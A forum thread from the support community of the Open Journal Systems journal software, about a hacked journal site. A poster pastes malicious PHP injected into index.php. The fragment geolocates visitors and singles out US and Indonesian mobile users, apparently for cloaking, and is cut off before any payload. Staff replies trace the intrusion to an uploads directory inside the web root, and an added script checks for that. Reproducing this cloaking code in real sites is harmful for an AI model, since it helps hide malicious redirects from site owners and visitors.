Site attacked - some files were modified such as index.php

Describe the issue or problem
It seems that our website has been attacked. The main page is frozen. The site is: https://journals.moleculepub.com/

We checked the files in the file manager and found that several files were updated. In particular, the index.php was modified. Here is the file:

```php
<?php
session_start();

// Detect the user's device (mobile or desktop) and country of origin
function isMobileDeviceFromIndonesiaOrUS() {
    $ip = $_SERVER['REMOTE_ADDR'];

    // Check whether the result is already cached in the session
    if (isset($_SESSION['ip_info'][$ip])) {
        $ip_info = $_SESSION['ip_info'][$ip];
    } else {
        // Get IP info from the API
        $ip_info = json_decode(file_get_contents("http://ip-api.com/json/$ip"));
        // Store the result in the session
        if ($ip_info) {
            $_SESSION['ip_info'][$ip] = $ip_info;
        }
    }

    // Also check whether the IP address is a VPN address
    $vpn_ip_ranges = array(
        '1.0.0.0/24',
        '2.0.0.0/16',
        // Add other VPN IP addresses if needed
    );
    foreach ($vpn_ip_ranges as $vpn_ip_range) {
        if (ip_in_range($ip, $vpn_ip_range)) {
            return false; // If the user is using a VPN
        }
    }

    // If the IP address comes from Indonesia or the United States
    if ($ip_info && ($ip_info->countryCode === 'ID' || $ip_info->countryCode === 'US')) {
        // If from Indonesia, check whether the device is mobile
        if ($ip_info->countryCode === 'ID') {
            return preg_match('/(android|iphone|ipod|ipad|iemobile|opera mini)/i', $_SERVER['HTTP_USER_AGENT']);
        }
        // If from the US, allow access without restriction
        return true;
    }
    return false; // For other countries
}

// Function to check whether an IP address falls within an IP range
function ip_in_range($ip, $range) {
    list($subnet, $mask) = explode('/', $range);
    return (ip2long($ip) & ~((1 <
```

The webpage now is frozen. Has anyone had a similar experience? Any solutions?

Steps I took leading up to the issue
I tried to change the index.php file by deleting the code above and using the following code, but it did not work:

```php
<?php
/**
 * @file ojs/index.php
 *
 * Copyright (c) 2014-2021 Simon Fraser University
 * Copyright (c) 2003-2021 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * Bootstrap code for OJS site. Loads required files and then calls the
 * dispatcher to delegate to the appropriate request handler.
 */

use APP\core\Application;

// Initialize global environment
define('INDEX_FILE_LOCATION', __FILE__);
require_once './lib/pkp/includes/bootstrap.php';

// Serve the request
Application::get()->execute();
```

What application are you using?
OJS 3.4

Additional information
These are the files that seem to be modified by the attack:
(screenshot of the modified files)

Hi @mazenhammadi,

Was your files directory (files_dir in config.inc.php) inside the web root?

If it was, that’s a dangerous configuration, and likely the way you got hacked.

Regards,
Alec Smecher
Public Knowledge Project Team

Hello @asmecher . Thank you for your reply. I am not sure, I normally access config.inc.php in the file manager. Any suggestions?

Hi @mazenhammadi,

What is the files_dir setting in your configuration file?

Regards,
Alec Smecher
Public Knowledge Project Team

Hi @asmecher

Here is the files_dir setting in your configuration file:

[files]

; Complete path to directory to store uploaded files
; (This directory should not be directly web-accessible)
; Windows users should use forward slashes
files_dir = /home4/molecup9/public_html/journals/files

; Path to the directory to store public uploaded files
; (This directory should be web-accessible and the specified path
; should be relative to the base OJS directory)
; Windows users should use forward slashes
public_files_dir = public

Hi @mazenhammadi,

This is what I suspected. Because you’ve placed the files directory inside public_html, its contents are directly accessible through the web server, bypassing OJS’s security. This makes your server easy to hack. There’s a warning about this in the configuration file, and on the installation form.

Regards,
Alec Smecher
Public Knowledge Project Team

Could you send more details about this please and how to increase the security of the website? I believe I need an IT expert to solve the problem.

Please see:
https://docs.pkp.sfu.ca/admin-guide/en/securing-your-system

For example, you could move from:

files_dir = /home4/molecup9/public_html/journals/files

To:
/home4/molecup9/journals_files

In addition to adjusting this setting, you need to move the folder and ensure that it is in the backup routine.
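A quick way to make the check Alec asks for, as an added example that is not part of this thread or of OJS itself: a POSIX shell script that reads files_dir from config.inc.php and reports whether it lies under the web root. The web root path is an assumption the administrator supplies (for the setup above, /home4/molecup9/public_html).

```shell
#!/bin/sh
# Added example (not from the thread or from OJS): report whether the OJS
# files_dir is inside the web root, i.e. directly served by the web server.
# Usage: sh check_files_dir.sh /path/to/config.inc.php /path/to/public_html

# Print the files_dir value from config.inc.php (first uncommented
# "files_dir =" line; commented ';' lines and public_files_dir do not match).
ojs_files_dir() {
    sed -n 's/^[[:space:]]*files_dir[[:space:]]*=[[:space:]]*//p' "$1" | head -n 1
}

# Return 0 if DIR equals the web root or lies under it, 1 otherwise.
# Paths are compared lexically after dropping trailing slashes, so the
# directories need not exist; on a live host, run both through realpath first.
path_under() {
    dir=$(printf '%s' "$1" | sed 's:/*$::')
    root=$(printf '%s' "$2" | sed 's:/*$::')
    case "$dir" in
        "$root"|"$root"/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Exit 1 when files_dir is web-accessible, 2 when the setting is missing.
check_files_dir() {
    config=$1
    webroot=$2
    files_dir=$(ojs_files_dir "$config")
    if [ -z "$files_dir" ]; then
        echo "no files_dir setting found in $config"
        return 2
    fi
    if path_under "$files_dir" "$webroot"; then
        echo "UNSAFE: files_dir $files_dir is inside web root $webroot"
        return 1
    fi
    echo "OK: files_dir $files_dir is outside web root $webroot"
    return 0
}

# Run the check when invoked with a config path and a web root.
if [ "$#" -eq 2 ]; then
    check_files_dir "$1" "$2"
fi
```

The exit status is non-zero for the unsafe layout, so the check can be dropped into a cron job or a post-deploy hook.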


@abadan Thank you for your suggestion. Just to clarify. So I can keep the folder of the journals where it is now: /home4/molecup9/public_html/journals. And just move the files folder to another place outside the public_html? Is that right?

That’s right, only “files” need to be moved out.
